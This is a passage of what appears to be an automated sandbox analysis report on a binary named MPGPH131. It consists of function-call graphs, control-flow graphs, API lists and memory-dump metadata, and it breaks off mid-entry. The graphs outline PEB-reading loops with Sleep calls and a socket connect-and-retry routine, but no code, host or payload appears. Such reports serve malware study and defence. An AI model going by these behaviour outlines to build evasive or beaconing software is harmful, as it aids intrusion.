19160->19164 19161->19160 19163 b1e65d 19162->19163 19165 b16db3 __freea RtlAllocateHeap 19162->19165 19166 b1e66f 19163->19166 19167 b16db3 __freea RtlAllocateHeap 19163->19167 19164->19162 19165->19163 19168 b1e681 19166->19168 19169 b16db3 __freea RtlAllocateHeap 19166->19169 19167->19166 19170 b1e693 19168->19170 19171 b16db3 __freea RtlAllocateHeap 19168->19171 19169->19168 19172 b16db3 __freea RtlAllocateHeap 19170->19172 19170->19173 19171->19170 19172->19173 19173->19126 19175 b1ea17 19174->19175 19185 b1ea6f 19174->19185 19176 b1ea27 19175->19176 19177 b16db3 __freea RtlAllocateHeap 19175->19177 19178 b16db3 __freea RtlAllocateHeap 19176->19178 19181 b1ea39 19176->19181 19177->19176 19178->19181 19179 b1ea4b 19180 b1ea5d 19179->19180 19183 b16db3 __freea RtlAllocateHeap 19179->19183 19184 b16db3 __freea RtlAllocateHeap 19180->19184 19180->19185 19181->19179 19182 b16db3 __freea RtlAllocateHeap 19181->19182 19182->19179 19183->19180 19184->19185 19185->19125 19187 b1f425 19186->19187 19188 b1f444 19186->19188 19187->19188 19189 b1ef31 __Getctype RtlAllocateHeap 19187->19189 19188->19135 19190 b1f43e 19189->19190 19191 b16db3 __freea RtlAllocateHeap 19190->19191 19191->19188 19193 b046fe ___std_exception_copy 19192->19193 19198 b04723 19193->19198 19195 b04716 19205 b044dc 19195->19205 19199 b04733 19198->19199 19202 b0473a ___std_exception_copy __Getctype 19198->19202 19211 b04541 19199->19211 19201 b04748 19201->19195 19202->19201 19203 b046ec ___std_exception_copy RtlAllocateHeap 19202->19203 19204 b047ac 19203->19204 19204->19195 19206 b044e8 19205->19206 19207 b044ff 19206->19207 19226 b04587 19206->19226 19209 b04512 19207->19209 19210 b04587 ___std_exception_copy RtlAllocateHeap 19207->19210 19209->19075 19210->19209 19212 b04550 19211->19212 19215 b15ddd 19212->19215 19216 b15df0 __dosmaperr 19215->19216 19217 b04572 19216->19217 19218 b163f3 __dosmaperr RtlAllocateHeap 19216->19218 19217->19202 19219 b15e20 __dosmaperr 19218->19219 19220 b15e5c 19219->19220 19221 b15e28 __dosmaperr 19219->19221 19223 b15a09 __dosmaperr RtlAllocateHeap 19220->19223 19222 b16db3 __freea RtlAllocateHeap 19221->19222 19222->19217 19224 b15e67 19223->19224 19225 b16db3 __freea RtlAllocateHeap 19224->19225 19225->19217 19227 b04591 19226->19227 19228 b0459a 19226->19228 19229 b04541 ___std_exception_copy RtlAllocateHeap 19227->19229 19228->19207 19230 b04596 19229->19230 19230->19228 19233 b10259 19230->19233 19234 b1025e std::locale::_Setgloballocale 19233->19234 19238 b10269 std::locale::_Setgloballocale 19234->19238 19239 b1c7c6 19234->19239 19260 b0f224 19238->19260 19243 b1c7d2 __fread_nolock 19239->19243 19240 b15d2c __dosmaperr RtlAllocateHeap 19245 b1c803 std::locale::_Setgloballocale 19240->19245 19241 b1c822 19242 b0d23f __dosmaperr RtlAllocateHeap 19241->19242 19244 b1c827 19242->19244 19243->19240 19243->19241 19243->19245 19247 b1c834 std::_Lockit::_Lockit std::locale::_Setgloballocale 19243->19247 19246 b047a0 ___std_exception_copy RtlAllocateHeap 19244->19246 19245->19241 19245->19247 19259 b1c80c 19245->19259 19246->19259 19248 b1c9a4 std::_Lockit::~_Lockit 19247->19248 19249 b1c8a7 19247->19249 19251 b1c8d5 std::locale::_Setgloballocale 19247->19251 19250 b0f224 std::locale::_Setgloballocale RtlAllocateHeap 19248->19250 19249->19251 19263 b15bdb 19249->19263 19252 b1c9b7 19250->19252 19254 b15bdb __Getctype RtlAllocateHeap 19251->19254 19257 b1c92a 19251->19257 19251->19259 19254->19257 19256 b15bdb __Getctype RtlAllocateHeap 19256->19251 19258 b15bdb __Getctype RtlAllocateHeap 19257->19258 19257->19259 19258->19259 19259->19238 19277 b0f094 19260->19277 19262 b0f235 19264 b15be4 __dosmaperr 19263->19264 19265 b163f3 __dosmaperr RtlAllocateHeap 19264->19265 19266 b15bfb 19264->19266 19268 b15c28 __dosmaperr 19265->19268 19267 b15c8b 19266->19267 19269 b10259 __Getctype RtlAllocateHeap 19266->19269 19267->19256 19271 b15c30 __dosmaperr 19268->19271 19272 b15c68 19268->19272 19270 b15c95 19269->19270 19273 b16db3 __freea RtlAllocateHeap 19271->19273 19274 b15a09 __dosmaperr RtlAllocateHeap 19272->19274 19273->19266 19275 b15c73 19274->19275 19276 b16db3 __freea RtlAllocateHeap 19275->19276 19276->19266 19278 b0f0c1 std::locale::_Setgloballocale 19277->19278 19279 b0ef23 std::locale::_Setgloballocale RtlAllocateHeap 19278->19279 19280 b0f10a std::locale::_Setgloballocale 19279->19280 19280->19262 19295 afd6e9 19281->19295 19292 a221de Concurrency::cancel_current_task std::_Xinvalid_argument 19291->19292 19293 b00651 ___std_exception_copy RtlAllocateHeap 19292->19293 19294 a22213 19293->19294 19294->19024 19298 afd4af 19295->19298 19297 afd6fa std::_Xinvalid_argument 19301 a23010 19298->19301 19302 b00651 ___std_exception_copy RtlAllocateHeap 19301->19302 19303 a2303d 19302->19303 19303->19297 19307 b052ac __fread_nolock 19304->19307 19305 b052b3 19306 b0d23f __dosmaperr RtlAllocateHeap 19305->19306 19308 b052b8 19306->19308 19307->19305 19309 b052d3 19307->19309 19310 b047a0 ___std_exception_copy RtlAllocateHeap 19308->19310 19311 b052e5 19309->19311 19312 b052d8 19309->19312 19313 b052c3 19310->19313 19318 b16688 19311->19318 19314 b0d23f __dosmaperr RtlAllocateHeap 19312->19314 19313->19033 19314->19313 19316 b052ee 19316->19313 19317 b0d23f __dosmaperr RtlAllocateHeap 19316->19317 19317->19313 19319 b16694 __fread_nolock std::_Lockit::_Lockit 19318->19319 19322 b1672c 19319->19322 19321 b166af 19321->19316 19326 b1674f __fread_nolock 19322->19326 19323 b16795 __fread_nolock 19323->19321 19324 b163f3 __dosmaperr RtlAllocateHeap 19325 b167b0 19324->19325 19327 b16db3 __freea RtlAllocateHeap 19325->19327 19326->19323 19326->19324 19327->19323 19330 b08e99 __fread_nolock 19328->19330 19329 b08e9f 19331 b04723 ___std_exception_copy RtlAllocateHeap 19329->19331 19330->19329 19333 b08ee2 __fread_nolock 19330->19333 19332 b08eba 19331->19332 19332->19037 19335 b09010 19333->19335 19336 b09023 19335->19336 19337 b09036 19335->19337 19336->19332 19344 b08f37 19337->19344 19339 b090e7 19339->19332 19340 b09059 19340->19339 19348 b055d3 19340->19348 19345 b08f48 19344->19345 19347 b08fa0 19344->19347 19345->19347 19357 b0e13d 19345->19357 19347->19340 19349 b05613 19348->19349 19350 b055ec 19348->19350 19354 b0e17d 19349->19354 19350->19349 19384 b15f82 19350->19384 19352 b05608 19391 b1538b 19352->19391 19355 b0e05c __fread_nolock 2 API calls 19354->19355 19356 b0e196 19355->19356 19356->19339 19358 b0e151 ___std_exception_copy 19357->19358 19363 b0e05c 19358->19363 19360 b0e166 19361 b044dc ___std_exception_copy RtlAllocateHeap 19360->19361 19362 b0e175 19361->19362 19362->19347 19368 b1a6de 19363->19368 19365 b0e06e 19366 b0e08a SetFilePointerEx 19365->19366 19367 b0e076 __fread_nolock 19365->19367 19366->19367 19367->19360 19369 b1a6eb 19368->19369 19372 b1a700 19368->19372 19381 b0d22c 19369->19381 19373 b0d22c __dosmaperr RtlAllocateHeap 19372->19373 19375 b1a725 19372->19375 19376 b1a730 19373->19376 19374 b0d23f __dosmaperr RtlAllocateHeap 19377 b1a6f8 19374->19377 19375->19365 19378 b0d23f __dosmaperr RtlAllocateHeap 19376->19378 19377->19365 19379 b1a738 19378->19379 19380 b047a0 ___std_exception_copy RtlAllocateHeap 19379->19380 19380->19377 19382 b15d2c __dosmaperr RtlAllocateHeap 19381->19382 19383 b0d231 19382->19383 19383->19374 19385 b15fa3 19384->19385 19386 b15f8e 19384->19386 19385->19352 19387 b0d23f __dosmaperr RtlAllocateHeap 19386->19387 19388 b15f93 19387->19388 19389 b047a0 ___std_exception_copy RtlAllocateHeap 19388->19389 19390 b15f9e 19389->19390 19390->19352 19393 b15397 __fread_nolock 19391->19393 19392 b153d8 19394 b04723 ___std_exception_copy RtlAllocateHeap 19392->19394 19393->19392 19395 b1541e 19393->19395 19397 b1539f 19393->19397 19394->19397 19395->19397 19398 b1549c 19395->19398 19397->19349 19401 b154c4 19398->19401 19411 b154e7 __fread_nolock 19398->19411 19399 b154c8 19400 b04723 ___std_exception_copy RtlAllocateHeap 19399->19400 19400->19411 19401->19399 19402 b15523 19401->19402 19403 b15541 19402->19403 19404 b0e17d 2 API calls 19402->19404 19412 b14fe1 19403->19412 19404->19403 19407 b155a0 19409 b15609 WriteFile 19407->19409 19407->19411 19408 b15559 19408->19411 19417 b14bb2 19408->19417 19409->19411 19411->19397 19423 b20d44 19412->19423 19414 b15021 19414->19407 19414->19408 19415 b14ff3 19415->19414 19432 b09d10 19415->19432 19418 b14c1a 19417->19418 19419 b09d10 std::_Locinfo::_Locinfo_ctor 2 API calls 19418->19419 19422 b14c2b std::_Locinfo::_Locinfo_ctor std::locale::_Locimp::_Locimp 19418->19422 19419->19422 19420 b184be RtlAllocateHeap RtlAllocateHeap 19420->19422 19421 b14ee1 _ValidateLocalCookies 19421->19411 19421->19421 19422->19420 19422->19421 19424 b20d51 19423->19424 19425 b20d5e 19423->19425 19426 b0d23f __dosmaperr RtlAllocateHeap 19424->19426 19428 b20d6a 19425->19428 19429 b0d23f __dosmaperr RtlAllocateHeap 19425->19429 19427 b20d56 19426->19427 19427->19415 19428->19415 19430 b20d8b 19429->19430 19431 b047a0 ___std_exception_copy RtlAllocateHeap 19430->19431 19431->19427 19433 b04587 ___std_exception_copy RtlAllocateHeap 19432->19433 19434 b09d20 19433->19434 19439 b15ef3 19434->19439 19440 b09d3d 19439->19440 19441 b15f0a 19439->19441 19443 b15f51 19440->19443 19441->19440 19447 b1f4f3 19441->19447 19444 b15f68 19443->19444 19445 b09d4a 19443->19445 19444->19445 19456 b1d81e 19444->19456 19445->19414 19448 b1f4ff __fread_nolock 19447->19448 19449 b15bdb __Getctype RtlAllocateHeap 19448->19449 19451 b1f508 std::_Lockit::_Lockit 19449->19451 19450 b1f54e 19450->19440 19451->19450 19452 b1f574 __Getctype RtlAllocateHeap 19451->19452 19453 b1f537 __Getctype 19452->19453 19453->19450 19454 b10259 __Getctype RtlAllocateHeap 19453->19454 19455 b1f573 19454->19455 19457 b15bdb __Getctype RtlAllocateHeap 19456->19457 19458 b1d823 19457->19458 19459 b1d736 std::_Locinfo::_Locinfo_ctor RtlAllocateHeap RtlAllocateHeap 19458->19459 19460 b1d82e 19459->19460 19460->19445 19462 b0480d __fread_nolock 19461->19462 19463 b04814 19462->19463 19464 b04835 __fread_nolock 19462->19464 19465 b04723 ___std_exception_copy RtlAllocateHeap 19463->19465 19468 b04910 19464->19468 19467 b0482d 19465->19467 19467->19043 19471 b04942 19468->19471 19470 b04922 19470->19467 19472 b04951 19471->19472 19473 b04979 19471->19473 19474 b04723 ___std_exception_copy RtlAllocateHeap 19472->19474 19475 b15f82 __fread_nolock RtlAllocateHeap 19473->19475 19482 b0496c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19474->19482 19476 b04982 19475->19476 19484 b0e11f 19476->19484 19479 b04a2c 19487 b04cae 19479->19487 19481 b04a43 19481->19482 19495 b04ae3 19481->19495 19482->19470 19502 b0df37 19484->19502 19486 b049a0 19486->19479 19486->19481 19486->19482 19488 b04cbd 19487->19488 19489 b15f82 __fread_nolock RtlAllocateHeap 19488->19489 19490 b04cd9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19489->19490 19491 b0e11f 2 API calls 19490->19491 19492 b04ce5 _ValidateLocalCookies 19490->19492 19493 b04d39 19491->19493 19492->19482 19493->19492 19494 b0e11f 2 API calls 19493->19494 19494->19492 19496 b15f82 __fread_nolock RtlAllocateHeap 19495->19496 19497 b04af6 19496->19497 19498 b0e11f 2 API calls 19497->19498 19500 b04b40 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19497->19500 19499 b04b9d 19498->19499 19499->19500 19501 b0e11f 2 API calls 19499->19501 19500->19482 19501->19500 19503 b0df43 __fread_nolock 19502->19503 19504 b0df4b 19503->19504 19505 b0df86 19503->19505 19507 b0dfcc 19503->19507 19504->19486 19506 b04723 ___std_exception_copy RtlAllocateHeap 19505->19506 19506->19504 19507->19504 19508 b0e05c __fread_nolock 2 API calls 19507->19508 19508->19504 19510 a906a9 19509->19510 19514 a90585 19509->19514 19511 a22270 RtlAllocateHeap 19510->19511 19512 a906ae 19511->19512 19513 a221d0 Concurrency::cancel_current_task RtlAllocateHeap 19512->19513 19522 a905aa __fread_nolock std::locale::_Locimp::_Locimp 19513->19522 19515 a905f0 19514->19515 19516 a905e3 19514->19516 19519 a9059a 19514->19519 19521 aff290 std::_Facet_Register RtlAllocateHeap 19515->19521 19515->19522 19516->19512 19516->19519 19517 aff290 std::_Facet_Register RtlAllocateHeap 19517->19522 19518 b047b0 RtlAllocateHeap 19520 a906b8 19518->19520 19519->19517 19521->19522 19522->19518 19523 a90667 __fread_nolock std::locale::_Locimp::_Locimp 19522->19523 19523->19049 19525 b0dc08 __fread_nolock 19524->19525 19526 b0dc40 __fread_nolock 19525->19526 19527 b0dc52 __fread_nolock 19525->19527 19528 b0dc1b __fread_nolock 19525->19528 19526->19053 19533 b0da06 19527->19533 19529 b0d23f __dosmaperr RtlAllocateHeap 19528->19529 19530 b0dc35 19529->19530 19532 b047a0 ___std_exception_copy RtlAllocateHeap 19530->19532 19532->19526 19534 b0da35 19533->19534 19536 b0da18 __fread_nolock 19533->19536 19534->19526 19535 b0da25 19537 b0d23f __dosmaperr RtlAllocateHeap 19535->19537 19536->19534 19536->19535 19539 b0da76 __fread_nolock 19536->19539 19544 b0da2a 19537->19544 19538 b047a0 ___std_exception_copy RtlAllocateHeap 19538->19534 19539->19534 19542 b0dba1 __fread_nolock 19539->19542 19543 b15f82 __fread_nolock RtlAllocateHeap 19539->19543 19546 b14623 19539->19546 19605 b08a2b 19539->19605 19541 b0d23f __dosmaperr RtlAllocateHeap 19541->19544 19542->19541 19543->19539 19544->19538 19547 b14635 19546->19547 19548 b1464d 19546->19548 19550 b0d22c __dosmaperr RtlAllocateHeap 19547->19550 19549 b1498f 19548->19549 19554 b14690 19548->19554 19552 b0d22c __dosmaperr RtlAllocateHeap 19549->19552 19551 b1463a 19550->19551 19553 b0d23f __dosmaperr RtlAllocateHeap 19551->19553 19555 b14994 19552->19555 19556 b14642 19553->19556 19554->19556 19557 b1469b 19554->19557 19564 b146cb 19554->19564 19558 b0d23f __dosmaperr RtlAllocateHeap 19555->19558 19556->19539 19559 b0d22c __dosmaperr RtlAllocateHeap 19557->19559 19560 b146a8 19558->19560 19561 b146a0 19559->19561 19563 b047a0 ___std_exception_copy RtlAllocateHeap 19560->19563 19562 b0d23f __dosmaperr RtlAllocateHeap 19561->19562 19562->19560 19563->19556 19565 b146e4 19564->19565 19566 b146f1 19564->19566 19567 b1471f 19564->19567 19565->19566 19592 b1470d 19565->19592 19568 b0d22c __dosmaperr RtlAllocateHeap 19566->19568 19619 b16e2d 19567->19619 19569 b146f6 19568->19569 19571 b0d23f __dosmaperr RtlAllocateHeap 19569->19571 19575 b146fd 19571->19575 19572 b20d44 __fread_nolock RtlAllocateHeap 19584 b1486b 19572->19584 19574 b16db3 __freea RtlAllocateHeap 19576 b14739 19574->19576 19577 b047a0 ___std_exception_copy RtlAllocateHeap 19575->19577 19578 b16db3 __freea RtlAllocateHeap 19576->19578 19604 b14708 __fread_nolock 19577->19604 19580 b14740 19578->19580 19579 b148e3 ReadFile 19581 b148fb 19579->19581 19589 b14957 19579->19589 19582 b14765 19580->19582 19583 b1474a 19580->19583 19585 b148d4 19581->19585 19581->19589 19588 b0e13d __fread_nolock 2 API calls 19582->19588 19586 b0d23f __dosmaperr RtlAllocateHeap 19583->19586 19584->19579 19593 b1489b 19584->19593 19595 b14920 19585->19595 19596 b14937 19585->19596 19585->19604 19591 b1474f 19586->19591 19587 b16db3 __freea RtlAllocateHeap 19587->19556 19588->19592 19590 b14964 19589->19590 19601 b148b5 19589->19601 19594 b0d23f __dosmaperr RtlAllocateHeap 19590->19594 19597 b0d22c __dosmaperr RtlAllocateHeap 19591->19597 19592->19572 19593->19585 19593->19601 19598 b14969 19594->19598 19630 b14335 19595->19630 19596->19604 19640 b1417b 19596->19640 19597->19604 19602 b0d22c __dosmaperr RtlAllocateHeap 19598->19602 19601->19604 19625 b0d1e5 19601->19625 19602->19604 19604->19587 19606 b08a3c 19605->19606 19612 b08a38 std::locale::_Locimp::_Locimp 19605->19612 19607 b08a43 19606->19607 19608 b08a56 __fread_nolock 19606->19608 19609 b0d23f __dosmaperr RtlAllocateHeap 19607->19609 19608->19612 19613 b08a84 19608->19613 19614 b08a8d 19608->19614 19610 b08a48 19609->19610 19611 b047a0 ___std_exception_copy RtlAllocateHeap 19610->19611 19611->19612 19612->19539 19615 b0d23f __dosmaperr RtlAllocateHeap 19613->19615 19614->19612 19617 b0d23f __dosmaperr RtlAllocateHeap 19614->19617 19616 b08a89 19615->19616 19618 b047a0 ___std_exception_copy RtlAllocateHeap 19616->19618 19617->19616 19618->19612 19620 b16e6b 19619->19620 19621 b16e3b __dosmaperr std::_Facet_Register 19619->19621 19622 b0d23f __dosmaperr RtlAllocateHeap 19620->19622 19621->19620 19623 b16e56 RtlAllocateHeap 19621->19623 19624 b14730 19622->19624 19623->19621 19623->19624 19624->19574 19626 b0d22c __dosmaperr RtlAllocateHeap 19625->19626 19627 b0d1f0 __dosmaperr 19626->19627 19628 b0d23f __dosmaperr RtlAllocateHeap 19627->19628 19629 b0d203 19628->19629 19629->19604 19644 b1402e 19630->19644 19633 b143d7 19637 b14391 __fread_nolock 19633->19637 19638 b0e13d __fread_nolock 2 API calls 19633->19638 19634 b143c7 19635 b0d23f __dosmaperr RtlAllocateHeap 19634->19635 19636 b1437d 19635->19636 19636->19604 19637->19636 19639 b0d1e5 __dosmaperr RtlAllocateHeap 19637->19639 19638->19637 19639->19636 19642 b141b5 19640->19642 19641 b14246 19641->19604 19642->19641 19643 b0e13d __fread_nolock 2 API calls 19642->19643 19643->19641 19645 b14062 19644->19645 19646 b140ce 19645->19646 19647 b0e13d __fread_nolock 2 API calls 19645->19647 19646->19633 19646->19634 19646->19636 19646->19637 19647->19646 19649 b08acf __fread_nolock 19648->19649 19650 b08ad9 19649->19650 19652 b08afc __fread_nolock 19649->19652 19651 b04723 ___std_exception_copy RtlAllocateHeap 19650->19651 19654 b08af4 19651->19654 19652->19654 19655 b08b5a 19652->19655 19654->19057 19656 b08b67 19655->19656 19657 b08b8a 19655->19657 19658 b04723 ___std_exception_copy RtlAllocateHeap 19656->19658 19659 b08b82 19657->19659 19660 b055d3 4 API calls 19657->19660 19658->19659 19659->19654 19661 b08ba2 19660->19661 19669 b16ded 19661->19669 19664 b15f82 __fread_nolock RtlAllocateHeap 19665 b08bb6 19664->19665 19673 b14a3f 19665->19673 19668 b16db3 __freea RtlAllocateHeap 19668->19659 19670 b16e04 19669->19670 19672 b08baa 19669->19672 19671 b16db3 __freea RtlAllocateHeap 19670->19671 19670->19672 19671->19672 19672->19664 19676 b08bbd 19673->19676 19677 b14a68 19673->19677 19674 b14ab7 19675 b04723 ___std_exception_copy RtlAllocateHeap 19674->19675 19675->19676 19676->19659 19676->19668 19677->19674 19678 b14a8f 19677->19678 19680 b149ae 19678->19680 19681 b149ba __fread_nolock 19680->19681 19683 b149f9 19681->19683 19684 b14b12 19681->19684 19683->19676 19685 b1a6de __fread_nolock RtlAllocateHeap 19684->19685 19688 b14b22 19685->19688 19686 b14b28 19696 b1a64d 19686->19696 19688->19686 19689 b14b5a 19688->19689 19691 b1a6de __fread_nolock RtlAllocateHeap 19688->19691 19689->19686 19690 b1a6de __fread_nolock RtlAllocateHeap 19689->19690 19692 b14b66 FindCloseChangeNotification 19690->19692 19693 b14b51 19691->19693 19692->19686 19694 b1a6de __fread_nolock RtlAllocateHeap 19693->19694 19694->19689 19695 b14b80 __fread_nolock 19695->19683 19699 b1a65c 19696->19699 19697 b0d23f __dosmaperr RtlAllocateHeap 19698 b1a6c8 19697->19698 19700 b0d22c __dosmaperr RtlAllocateHeap 19698->19700 19699->19697 19701 b1a686 19699->19701 19700->19701 19701->19695 21032 50608b4 21033 50608cf GetCurrentHwProfileW 21032->21033 21034 50608d6 GetCurrentHwProfileW 21032->21034 21036 506091f 21033->21036 21034->21033

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 134 a83a40-a83a52 135 a83a55-a83a61 134->135 137 a83b28-a83b31 GetPEB 135->137 138 a83a67-a83a6d 135->138 139 a83b34-a83b48 137->139 138->137 140 a83a73-a83a7f GetPEB 138->140 141 a83b99-a83b9b 139->141 142 a83b4a-a83b4f 139->142 143 a83a80-a83a94 140->143 141->139 142->141 144 a83b51-a83b59 142->144 145 a83ae4-a83ae6 143->145 146 a83a96-a83a9b 143->146 147 a83b60-a83b73 144->147 145->143 146->145 148 a83a9d-a83aa3 146->148 149 a83b92-a83b97 147->149 150 a83b75-a83b88 147->150 151 a83aa5-a83ab8 148->151 149->141 149->147 150->150 152 a83b8a-a83b90 150->152 153 a83aba 151->153 154 a83add-a83ae2 151->154 152->149 155 a83b9d-a83bc2 Sleep 152->155 156 a83ac0-a83ad3 153->156 154->145 154->151 155->135 156->156 157 a83ad5-a83adb 156->157 157->154 158 a83ae8-a83b0d Sleep 157->158 159 a83b13-a83b1a 158->159 159->137 160 a83b1c-a83b22 159->160 160->137 161 a83bc7-a83bd8 call a26bd0 160->161 164 a83bda-a83bdc 161->164 165 a83bde 161->165 166 a83be0-a83bfd call a26bd0 164->166 165->166
                                  APIs
                                  • Sleep.KERNELBASE(000003E9,?,00000001,00000000,?,?,?,?,?,?,?,?,00A83DB6), ref: 00A83B08
                                  • Sleep.KERNELBASE(00000001,?,00000001,00000000,?,?,?,?,?,?,?,?,00A83DB6), ref: 00A83BBA
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 01bed4162a67f9c8f4f98040f6f801496c82fa7e738f510d64aae8c16ea8e2be
                                  • Instruction ID: e22e3a543ef316c1e262e008ca37abb12136734d42445eb14914160d3c598287
                                  • Opcode Fuzzy Hash: 01bed4162a67f9c8f4f98040f6f801496c82fa7e738f510d64aae8c16ea8e2be
                                  • Instruction Fuzzy Hash: 3F51BB76A042158FCF28EF58C4D4EAAB7B1EF44B44B298599D845AF311D732EE05CB80

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 a3e0a0-a3e0d2 WSAStartup 1 a3e1b7-a3e1c0 0->1 2 a3e0d8-a3e102 call a26bd0 * 2 0->2 7 a3e104-a3e108 2->7 8 a3e10e-a3e165 2->8 7->1 7->8 10 a3e1b1-a3e1b6 8->10 11 a3e167-a3e16d 8->11 10->1 12 a3e1c5-a3e1cf 11->12 13 a3e16f 11->13 12->10 20 a3e1d1-a3e1d9 12->20 15 a3e175-a3e189 socket 13->15 15->10 17 a3e18b-a3e19b connect 15->17 18 a3e1c1 17->18 19 a3e19d-a3e1a5 closesocket 17->19 18->12 19->15 21 a3e1a7-a3e1ab 19->21 21->10
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startupclosesocketconnectsocket
                                  • String ID:
                                  • API String ID: 3098855095-0
                                  • Opcode ID: eb15e9222f4f7fe6072cde27fb595f8355d929ac4c247841977754628f6ed95c
                                  • Instruction ID: a99e5e7770c33e941601438870cd032a2681422b81e80b3c96bc7f529f025db8
                                  • Opcode Fuzzy Hash: eb15e9222f4f7fe6072cde27fb595f8355d929ac4c247841977754628f6ed95c
                                  • Instruction Fuzzy Hash: 8131D372605310ABE720DF65DC4472BB7E4EB95734F004F1DF9A8A72D0D73599048BA2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 22 b14623-b14633 23 b14635-b14648 call b0d22c call b0d23f 22->23 24 b1464d-b1464f 22->24 38 b149a7 23->38 25 b14655-b1465b 24->25 26 b1498f-b1499c call b0d22c call b0d23f 24->26 25->26 29 b14661-b1468a 25->29 45 b149a2 call b047a0 26->45 29->26 32 b14690-b14699 29->32 35 b146b3-b146b5 32->35 36 b1469b-b146ae call b0d22c call b0d23f 32->36 41 b1498b-b1498d 35->41 42 b146bb-b146bf 35->42 36->45 43 b149aa-b149ad 38->43 41->43 42->41 46 b146c5-b146c9 42->46 45->38 46->36 49 b146cb-b146e2 46->49 50 b146e4-b146e7 49->50 51 b14717-b1471d 49->51 53 b146e9-b146ef 50->53 54 b1470d-b14715 50->54 55 b146f1-b14708 call b0d22c call b0d23f call b047a0 51->55 56 b1471f-b14726 51->56 53->54 53->55 58 b1478a-b147a9 54->58 85 b148c2 55->85 59 b14728 56->59 60 b1472a-b1472b call b16e2d 56->60 62 b14865-b1486e call b20d44 58->62 63 b147af-b147bb 58->63 59->60 68 b14730-b14748 call b16db3 * 2 60->68 76 b14870-b14882 62->76 77 b148df 62->77 63->62 67 b147c1-b147c3 63->67 67->62 72 b147c9-b147ea 67->72 89 b14765-b14788 call b0e13d 68->89 90 b1474a-b14760 call b0d23f call b0d22c 68->90 72->62 73 b147ec-b14802 72->73 73->62 78 b14804-b14806 73->78 76->77 81 b14884-b14893 76->81 82 b148e3-b148f9 ReadFile 77->82 78->62 83 b14808-b1482b 78->83 81->77 99 b14895-b14899 81->99 86 b14957-b14962 82->86 87 b148fb-b14901 82->87 83->62 88 b1482d-b14843 83->88 91 b148c5-b148cf call b16db3 85->91 101 b14964-b14976 call b0d23f call b0d22c 86->101 102 b1497b-b1497e 86->102 87->86 93 b14903 87->93 88->62 95 b14845-b14847 88->95 89->58 90->85 91->43 94 b14906-b14918 93->94 94->91 103 b1491a-b1491e 94->103 95->62 104 b14849-b14860 95->104 99->82 108 b1489b-b148b3 99->108 101->85 112 b14984-b14986 102->112 113 b148bb-b148c1 call b0d1e5 102->113 110 b14920-b14930 call b14335 103->110 111 b14937-b14944 103->111 104->62 122 b148b5-b148ba 108->122 123 b148d4-b148dd 108->123 130 b14933-b14935 110->130 119 b14950-b14955 call b1417b 111->119 120 b14946 call b1448c 111->120 112->91 113->85 131 b1494b-b1494e 119->131 120->131 122->113 123->94 130->91 131->130
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
